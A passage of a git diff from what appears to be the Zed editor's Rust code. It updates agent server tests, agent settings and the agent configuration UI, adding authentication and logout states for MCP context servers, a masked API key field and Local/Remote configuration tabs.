default_mode: None, @@ -456,6 +457,7 @@ mod tests { AgentRegistryStore, RegistryAgent, RegistryAgentMetadata, RegistryNpxAgent, }; use settings::Settings as _; + use ui::SharedString; fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { @@ -471,11 +473,12 @@ mod tests { let id = SharedString::from(id.to_string()); RegistryAgent::Npx(RegistryNpxAgent { metadata: RegistryAgentMetadata { - id: id.clone(), + id: AgentId::new(id.clone()), name: id.clone(), description: SharedString::from(""), version: SharedString::from("1.0.0"), repository: None, + website: None, icon_path: None, }, package: id, @@ -506,16 +509,6 @@ mod tests { }); } - #[gpui::test] - fn test_previous_builtins_are_registry(cx: &mut TestAppContext) { - init_test(cx); - cx.update(|cx| { - assert!(is_registry_agent(CLAUDE_AGENT_NAME, cx)); - assert!(is_registry_agent(CODEX_NAME, cx)); - assert!(is_registry_agent(GEMINI_NAME, cx)); - }); - } - #[gpui::test] fn test_unknown_agent_is_not_registry(cx: &mut TestAppContext) { init_test(cx); @@ -578,25 +571,6 @@ mod tests { }); } - #[gpui::test] - fn test_default_settings_for_builtin_agent(cx: &mut TestAppContext) { - init_test(cx); - cx.update(|cx| { - assert!(matches!( - default_settings_for_agent(CODEX_NAME, cx), - settings::CustomAgentServerSettings::Registry { .. } - )); - assert!(matches!( - default_settings_for_agent(CLAUDE_AGENT_NAME, cx), - settings::CustomAgentServerSettings::Registry { .. } - )); - assert!(matches!( - default_settings_for_agent(GEMINI_NAME, cx), - settings::CustomAgentServerSettings::Registry { .. } - )); - }); - } - #[gpui::test] fn test_default_settings_for_extension_agent(cx: &mut TestAppContext) { init_test(cx); diff --git a/crates/agent_servers/src/e2e_tests.rs b/crates/agent_servers/src/e2e_tests.rs index a0150d41726c94dc830be70e006f4370de919ead..956d106df2a260bd2eb31c14f4f1f1705bf74cd6 100644 --- a/crates/agent_servers/src/e2e_tests.rs +++ b/crates/agent_servers/src/e2e_tests.rs @@ -14,6 +14,7 @@ use std::{ time::Duration, }; use util::path; +use util::path_list::PathList; pub async fn test_basic(server: F, cx: &mut TestAppContext) where @@ -207,8 +208,10 @@ pub async fn test_tool_call_with_permission( thread.update(cx, |thread, cx| { thread.authorize_tool_call( tool_call_id, - allow_option_id, - acp::PermissionOptionKind::AllowOnce, + acp_thread::SelectedPermissionOutcome::new( + allow_option_id, + acp::PermissionOptionKind::AllowOnce, + ), cx, ); @@ -431,13 +434,18 @@ pub async fn new_test_thread( cx: &mut TestAppContext, ) -> Entity { let store = project.read_with(cx, |project, _| project.agent_server_store().clone()); - let delegate = AgentServerDelegate::new(store, project.clone(), None, None); + let delegate = AgentServerDelegate::new(store, None); - let connection = cx.update(|cx| server.connect(delegate, cx)).await.unwrap(); - - cx.update(|cx| connection.new_session(project.clone(), current_dir.as_ref(), cx)) + let connection = cx + .update(|cx| server.connect(delegate, project.clone(), cx)) .await - .unwrap() + .unwrap(); + + cx.update(|cx| { + connection.new_session(project.clone(), PathList::new(&[current_dir.as_ref()]), cx) + }) + .await + .unwrap() } pub async fn run_until_first_tool_call( diff --git a/crates/agent_settings/src/agent_settings.rs b/crates/agent_settings/src/agent_settings.rs index 02341af42b9247ba07cb3f8c771a51626cd721ed..d5d4f16eb742a92f6abf8081c43709f161ef4038 100644 --- a/crates/agent_settings/src/agent_settings.rs +++ b/crates/agent_settings/src/agent_settings.rs @@ -12,7 +12,7 @@ use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings::{ DefaultAgentView, DockPosition, LanguageModelParameters, LanguageModelSelection, - NotifyWhenAgentWaiting, RegisterSetting, Settings, ToolPermissionMode, + NewThreadLocation, NotifyWhenAgentWaiting, RegisterSetting, Settings, ToolPermissionMode, }; pub use crate::agent_profile::*; @@ -51,6 +51,7 @@ pub struct AgentSettings { pub message_editor_min_lines: usize, pub show_turn_stats: bool, pub tool_permissions: ToolPermissions, + pub new_thread_location: NewThreadLocation, } impl AgentSettings { @@ -438,6 +439,7 @@ impl Settings for AgentSettings { message_editor_min_lines: agent.message_editor_min_lines.unwrap(), show_turn_stats: agent.show_turn_stats.unwrap(), tool_permissions: compile_tool_permissions(agent.tool_permissions), + new_thread_location: agent.new_thread_location.unwrap_or_default(), } } } diff --git a/crates/agent_ui/Cargo.toml b/crates/agent_ui/Cargo.toml index 8b06417d2f5812ef2e0fb265e6afa4cfeb26eb3f..b60f2a6b136c5e4dbb131603d95623a719ce7134 100644 --- a/crates/agent_ui/Cargo.toml +++ b/crates/agent_ui/Cargo.toml @@ -34,7 +34,7 @@ agent_servers.workspace = true agent_settings.workspace = true ai_onboarding.workspace = true anyhow.workspace = true -arrayvec.workspace = true +heapless.workspace = true assistant_text_thread.workspace = true assistant_slash_command.workspace = true assistant_slash_commands.workspace = true diff --git a/crates/agent_ui/src/agent_configuration.rs b/crates/agent_ui/src/agent_configuration.rs index aa316ba7c5efe5f679764cd7d4626a1f1310e4c6..fc5a78dfc936617f3782eae154b6a13531e5c425 100644 --- a/crates/agent_ui/src/agent_configuration.rs +++ b/crates/agent_ui/src/agent_configuration.rs @@ -28,7 +28,7 @@ use language_model::{ use language_models::AllLanguageModelSettings; use notifications::status_toast::{StatusToast, ToastIcon}; use project::{ - agent_server_store::{AgentServerStore, ExternalAgentServerName, ExternalAgentSource}, + agent_server_store::{AgentId, AgentServerStore, ExternalAgentSource}, context_server_store::{ContextServerConfiguration, ContextServerStatus, ContextServerStore}, }; use settings::{Settings, SettingsStore, update_settings_file}; @@ -228,6 +228,7 @@ impl AgentConfiguration { .unwrap_or(false); v_flex() + .min_w_0() .w_full() .when(is_expanded, |this| this.mb_2()) .child( @@ -312,6 +313,7 @@ impl AgentConfiguration { ) .child( v_flex() + .min_w_0() .w_full() .px_2() .gap_1() @@ -330,10 +332,11 @@ impl AgentConfiguration { .full_width() .style(ButtonStyle::Outlined) .layer(ElevationIndex::ModalSurface) - .icon_position(IconPosition::Start) - .icon(IconName::Thread) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Thread) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener({ let provider = provider.clone(); @@ -355,10 +358,11 @@ impl AgentConfiguration { ) .full_width() .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Trash) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Trash) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener({ let provider = provider.clone(); @@ -424,10 +428,11 @@ impl AgentConfiguration { .trigger( Button::new("add-provider", "Add Provider") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small), ) .menu({ @@ -459,6 +464,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .w_full() .child(self.render_section_title( "LLM Providers", @@ -498,6 +504,7 @@ impl AgentConfiguration { Plan::ZedFree => ("Free", Color::Default, free_chip_bg), Plan::ZedProTrial => ("Pro Trial", Color::Accent, pro_chip_bg), Plan::ZedPro => ("Pro", Color::Accent, pro_chip_bg), + Plan::ZedBusiness => ("Business", Color::Accent, pro_chip_bg), Plan::ZedStudent => ("Student", Color::Accent, pro_chip_bg), }; @@ -510,21 +517,18 @@ impl AgentConfiguration { } } - fn render_context_servers_section( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> impl IntoElement { + fn render_context_servers_section(&mut self, cx: &mut Context) -> impl IntoElement { let context_server_ids = self.context_server_store.read(cx).server_ids(); let add_server_popover = PopoverMenu::new("add-server-popover") .trigger( Button::new("add-server", "Add Server") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small), ) .menu({ @@ -559,6 +563,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .border_b_1() .border_color(cx.theme().colors().border) .child(self.render_section_title( @@ -592,7 +597,7 @@ impl AgentConfiguration { } else { parent.children(itertools::intersperse_with( context_server_ids.iter().cloned().map(|context_server_id| { - self.render_context_server(context_server_id, window, cx) + self.render_context_server(context_server_id, cx) .into_any_element() }), || { @@ -609,7 +614,6 @@ impl AgentConfiguration { fn render_context_server( &self, context_server_id: ContextServerId, - window: &mut Window, cx: &Context, ) -> impl use<> + IntoElement { let server_status = self @@ -637,6 +641,9 @@ impl AgentConfiguration { } else { None }; + let auth_required = matches!(server_status, ContextServerStatus::AuthRequired); + let authenticating = matches!(server_status, ContextServerStatus::Authenticating); + let context_server_store = self.context_server_store.clone(); let tool_count = self .context_server_registry @@ -680,11 +687,33 @@ impl AgentConfiguration { Indicator::dot().color(Color::Muted).into_any_element(), "Server is stopped.", ), + ContextServerStatus::AuthRequired => ( + Indicator::dot().color(Color::Warning).into_any_element(), + "Authentication required.", + ), + ContextServerStatus::Authenticating => ( + Icon::new(IconName::LoadCircle) + .size(IconSize::XSmall) + .color(Color::Accent) + .with_keyed_rotate_animation( + SharedString::from(format!("{}-authenticating", context_server_id.0)), + 3, + ) + .into_any_element(), + "Waiting for authorization...", + ), }; + let is_remote = server_configuration .as_ref() .map(|config| matches!(config.as_ref(), ContextServerConfiguration::Http { .. })) .unwrap_or(false); + + let should_show_logout_button = server_configuration.as_ref().is_some_and(|config| { + matches!(config.as_ref(), ContextServerConfiguration::Http { .. }) + && !config.has_static_auth_header() + }); + let context_server_configuration_menu = PopoverMenu::new("context-server-config-menu") .trigger_with_tooltip( IconButton::new("context-server-config-menu", IconName::Settings) @@ -699,6 +728,7 @@ impl AgentConfiguration { let language_registry = self.language_registry.clone(); let workspace = self.workspace.clone(); let context_server_registry = self.context_server_registry.clone(); + let context_server_store = context_server_store.clone(); move |window, cx| { Some(ContextMenu::build(window, cx, |menu, _window, _cx| { @@ -745,6 +775,17 @@ impl AgentConfiguration { .ok(); } })) + .when(should_show_logout_button, |this| { + this.entry("Log Out", None, { + let context_server_store = context_server_store.clone(); + let context_server_id = context_server_id.clone(); + move |_window, cx| { + context_server_store.update(cx, |store, cx| { + store.logout_server(&context_server_id, cx).log_err(); + }); + } + }) + }) .separator() .entry("Uninstall", None, { let fs = fs.clone(); @@ -801,10 +842,16 @@ impl AgentConfiguration { } }); + let feedback_base_container = + || h_flex().py_1().min_w_0().w_full().gap_1().justify_between(); + v_flex() + .min_w_0() .id(item_id.clone()) .child( h_flex() + .min_w_0() + .w_full() .justify_between() .child( h_flex() @@ -820,13 +867,13 @@ impl AgentConfiguration { .tooltip(Tooltip::text(tooltip_text)) .child(status_indicator), ) - .child(Label::new(item_id).truncate()) + .child(Label::new(item_id).flex_shrink_0().truncate()) .child( div() .id("extension-source") + .min_w_0() .mt_0p5() .mx_1() - .flex_none() .tooltip(Tooltip::text(source_tooltip)) .child( Icon::new(source_icon) @@ -856,6 +903,7 @@ impl AgentConfiguration { .on_click({ let context_server_manager = self.context_server_store.clone(); let fs = self.fs.clone(); + let context_server_id = context_server_id.clone(); move |state, _window, cx| { let is_enabled = match state { @@ -903,32 +951,113 @@ impl AgentConfiguration { ) .map(|parent| { if let Some(error) = error { + return parent + .child( + feedback_base_container() + .child( + h_flex() + .pr_4() + .min_w_0() + .w_full() + .gap_2() + .child( + Icon::new(IconName::XCircle) + .size(IconSize::XSmall) + .color(Color::Error), + ) + .child( + div().min_w_0().flex_1().child( + Label::new(error) + .color(Color::Muted) + .size(LabelSize::Small), + ), + ), + ) + .when(should_show_logout_button, |this| { + this.child( + Button::new("error-logout-server", "Log Out") + .style(ButtonStyle::Outlined) + .label_size(LabelSize::Small) + .on_click({ + let context_server_store = + context_server_store.clone(); + let context_server_id = + context_server_id.clone(); + move |_event, _window, cx| { + context_server_store.update( + cx, + |store, cx| { + store + .logout_server( + &context_server_id, + cx, + ) + .log_err(); + }, + ); + } + }), + ) + }), + ); + } + if auth_required { return parent.child( - h_flex() - .gap_2() - .pr_4() - .items_start() + feedback_base_container() .child( h_flex() - .flex_none() - .h(window.line_height() / 1.6_f32) - .justify_center() + .pr_4() + .min_w_0() + .w_full() + .gap_2() .child( - Icon::new(IconName::XCircle) + Icon::new(IconName::Info) .size(IconSize::XSmall) - .color(Color::Error), + .color(Color::Muted), + ) + .child( + Label::new("Authenticate to connect this server") + .color(Color::Muted) + .size(LabelSize::Small), ), ) .child( - div().w_full().child( - Label::new(error) - .buffer_font(cx) - .color(Color::Muted) - .size(LabelSize::Small), - ), + Button::new("error-logout-server", "Authenticate") + .style(ButtonStyle::Outlined) + .label_size(LabelSize::Small) + .on_click({ + let context_server_store = context_server_store.clone(); + let context_server_id = context_server_id.clone(); + move |_event, _window, cx| { + context_server_store.update(cx, |store, cx| { + store + .authenticate_server(&context_server_id, cx) + .log_err(); + }); + } + }), ), ); } + if authenticating { + return parent.child( + h_flex() + .mt_1() + .pr_4() + .min_w_0() + .w_full() + .gap_2() + .child( + div().size_3().flex_shrink_0(), // Alignment Div + ) + .child( + Label::new("Authenticating…") + .color(Color::Muted) + .size(LabelSize::Small), + ), + + ); + } parent }) } @@ -962,10 +1091,11 @@ impl AgentConfiguration { .trigger( Button::new("add-agent", "Add Agent") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small), ) .menu({ @@ -1019,6 +1149,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .border_b_1() .border_color(cx.theme().colors().border) .child( @@ -1089,7 +1220,7 @@ impl AgentConfiguration { ExternalAgentSource::Custom => None, }; - let agent_server_name = ExternalAgentServerName(id.clone()); + let agent_server_name = AgentId(id.clone()); let uninstall_button = match source { ExternalAgentSource::Extension => Some( @@ -1217,9 +1348,10 @@ impl Render for AgentConfiguration { .id("assistant-configuration-content") .track_scroll(&self.scroll_handle) .size_full() + .min_w_0() .overflow_y_scroll() .child(self.render_agent_servers_section(cx)) - .child(self.render_context_servers_section(window, cx)) + .child(self.render_context_servers_section(cx)) .child(self.render_provider_configuration_section(cx)), ) .vertical_scrollbar_for(&self.scroll_handle, window, cx), diff --git a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs index a3a389ac0a068d92112ee98caacb2986c499ad86..334aaf4026527938144cf12e25c9a7a23d5c28ac 100644 --- a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs +++ b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs @@ -68,14 +68,17 @@ impl AddLlmProviderInput { let provider_name = single_line_input("Provider Name", provider.name(), None, 1, window, cx); let api_url = single_line_input("API URL", provider.api_url(), None, 2, window, cx); - let api_key = single_line_input( - "API Key", - "000000000000000000000000000000000000000000000000", - None, - 3, - window, - cx, - ); + let api_key = cx.new(|cx| { + InputField::new( + window, + cx, + "000000000000000000000000000000000000000000000000", + ) + .label("API Key") + .tab_index(3) + .tab_stop(true) + .masked(true) + }); Self { provider_name, @@ -340,10 +343,11 @@ impl AddLlmProviderModal { .child(Label::new("Models").size(LabelSize::Small)) .child( Button::new("add-model", "Add Model") - .icon(IconName::Plus) - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener(|this, _, window, cx| { this.input.add_model(window, cx); @@ -446,10 +450,11 @@ impl AddLlmProviderModal { .when(has_more_than_one_model, |this| { this.child( Button::new(("remove-model", ix), "Remove Model") - .icon(IconName::Trash) - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Trash) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .style(ButtonStyle::Outlined) .full_width() diff --git a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs index 38805f2c26693f168c7273afddf5aceea44f83e3..e550d59c0ccb4deab40f6fcbc39dae124e3c08db 100644 --- a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs +++ b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs @@ -1,25 +1,27 @@ -use std::sync::{Arc, Mutex}; - use anyhow::{Context as _, Result}; use collections::HashMap; use context_server::{ContextServerCommand, ContextServerId}; use editor::{Editor, EditorElement, EditorStyle}; + use gpui::{ AsyncWindowContext, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, ScrollHandle, - Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*, + Subscription, Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*, }; use language::{Language, LanguageRegistry}; use markdown::{Markdown, MarkdownElement, MarkdownStyle}; use notifications::status_toast::{StatusToast, ToastIcon}; +use parking_lot::Mutex; use project::{ context_server_store::{ - ContextServerStatus, ContextServerStore, registry::ContextServerDescriptorRegistry, + ContextServerStatus, ContextServerStore, ServerStatusChangedEvent, + registry::ContextServerDescriptorRegistry, }, project_settings::{ContextServerSettings, ProjectSettings}, worktree_store::WorktreeStore, }; use serde::Deserialize; use settings::{Settings as _, update_settings_file}; +use std::sync::Arc; use theme::ThemeSettings; use ui::{ CommonAnimationExt, KeyBinding, Modal, ModalFooter, ModalHeader, Section, Tooltip, @@ -237,6 +239,8 @@ fn context_server_input(existing: Option<(ContextServerId, ContextServerCommand) format!( r#"{{ + /// Configure an MCP server that runs locally via stdin/stdout + /// /// The name of your MCP server "{name}": {{ /// The command which runs the MCP server @@ -280,6 +284,8 @@ fn context_server_http_input( format!( r#"{{ + /// Configure an MCP server that you connect to over HTTP + /// /// The name of your remote MCP server "{name}": {{ /// The URL of the remote MCP server @@ -342,6 +348,8 @@ fn resolve_context_server_extension( enum State { Idle, Waiting, + AuthRequired { server_id: ContextServerId }, + Authenticating { _server_id: ContextServerId }, Error(SharedString), } @@ -352,6 +360,7 @@ pub struct ConfigureContextServerModal { state: State, original_server_id: Option, scroll_handle: ScrollHandle, + _auth_subscription: Option, } impl ConfigureContextServerModal { @@ -475,6 +484,7 @@ impl ConfigureContextServerModal { cx, ), scroll_handle: ScrollHandle::new(), + _auth_subscription: None, }) }) }) @@ -486,6 +496,13 @@ impl ConfigureContextServerModal { } fn confirm(&mut self, _: &menu::Confirm, cx: &mut Context) { + if matches!( + self.state, + State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. } + ) { + return; + } + self.state = State::Idle; let Some(workspace) = self.workspace.upgrade() else { return; @@ -515,14 +532,19 @@ impl ConfigureContextServerModal { async move |this, cx| { let result = wait_for_context_server_task.await; this.update(cx, |this, cx| match result { - Ok(_) => { + Ok(ContextServerStatus::Running) => { this.state = State::Idle; this.show_configured_context_server_toast(id, cx); cx.emit(DismissEvent); } + Ok(ContextServerStatus::AuthRequired) => { + this.state = State::AuthRequired { server_id: id }; + cx.notify(); + } Err(err) => { this.set_error(err, cx); } + Ok(_) => {} }) } }) @@ -558,6 +580,49 @@ impl ConfigureContextServerModal { cx.emit(DismissEvent); } + fn authenticate(&mut self, server_id: ContextServerId, cx: &mut Context) { + self.context_server_store.update(cx, |store, cx| { + store.authenticate_server(&server_id, cx).log_err(); + }); + + self.state = State::Authenticating { + _server_id: server_id.clone(), + }; + + self._auth_subscription = Some(cx.subscribe( + &self.context_server_store, + move |this, _, event: &ServerStatusChangedEvent, cx| { + if event.server_id != server_id { + return; + } + match &event.status { + ContextServerStatus::Running => { + this._auth_subscription = None; + this.state = State::Idle; + this.show_configured_context_server_toast(event.server_id.clone(), cx); + cx.emit(DismissEvent); + } + ContextServerStatus::AuthRequired => { + this._auth_subscription = None; + this.state = State::AuthRequired { + server_id: event.server_id.clone(), + }; + cx.notify(); + } + ContextServerStatus::Error(error) => { + this._auth_subscription = None; + this.set_error(error.clone(), cx); + } + ContextServerStatus::Authenticating + | ContextServerStatus::Starting + | ContextServerStatus::Stopped => {} + } + }, + )); + + cx.notify(); + } + fn show_configured_context_server_toast(&self, id: ContextServerId, cx: &mut App) { self.workspace .update(cx, { @@ -615,7 +680,8 @@ impl ConfigureContextServerModal { } fn render_modal_description(&self, window: &mut Window, cx: &mut Context) -> AnyElement { - const MODAL_DESCRIPTION: &str = "Visit the MCP server configuration docs to find all necessary arguments and environment variables."; + const MODAL_DESCRIPTION: &str = + "Check the server docs for required arguments and environment variables."; if let ConfigurationSource::Extension { installation_instructions: Some(installation_instructions), @@ -637,6 +703,67 @@ impl ConfigureContextServerModal { } } + fn render_tab_bar(&self, cx: &mut Context) -> Option { + let is_http = match &self.source { + ConfigurationSource::New { is_http, .. } => *is_http, + _ => return None, + }; + + let tab = |label: &'static str, active: bool| { + div() + .id(label) + .cursor_pointer() + .p_1() + .text_sm() + .border_b_1() + .when(active, |this| { + this.border_color(cx.theme().colors().border_focused) + }) + .when(!active, |this| { + this.border_color(gpui::transparent_black()) + .text_color(cx.theme().colors().text_muted) + .hover(|s| s.text_color(cx.theme().colors().text)) + }) + .child(label) + }; + + Some( + h_flex() + .pt_1() + .mb_2p5() + .gap_1() + .border_b_1() + .border_color(cx.theme().colors().border.opacity(0.5)) + .child( + tab("Local", !is_http).on_click(cx.listener(|this, _, window, cx| { + if let ConfigurationSource::New { editor, is_http } = &mut this.source { + if *is_http { + *is_http = false; + let new_text = context_server_input(None); + editor.update(cx, |editor, cx| { + editor.set_text(new_text, window, cx); + }); + } + } + })), + ) + .child( + tab("Remote", is_http).on_click(cx.listener(|this, _, window, cx| { + if let ConfigurationSource::New { editor, is_http } = &mut this.source { + if !*is_http { + *is_http = true; + let new_text = context_server_http_input(None); + editor.update(cx, |editor, cx| { + editor.set_text(new_text, window, cx); + }); + } + } + })), + ) + .into_any_element(), + ) + } + fn render_modal_content(&self, cx: &App) -> AnyElement { let editor = match &self.source { ConfigurationSource::New { editor, .. } => editor, @@ -682,7 +809,10 @@ impl ConfigureContextServerModal { fn render_modal_footer(&self, cx: &mut Context) -> ModalFooter { let focus_handle = self.focus_handle(cx); - let is_connecting = matches!(self.state, State::Waiting); + let is_busy = matches!( + self.state, + State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. } + ); ModalFooter::new() .start_slot::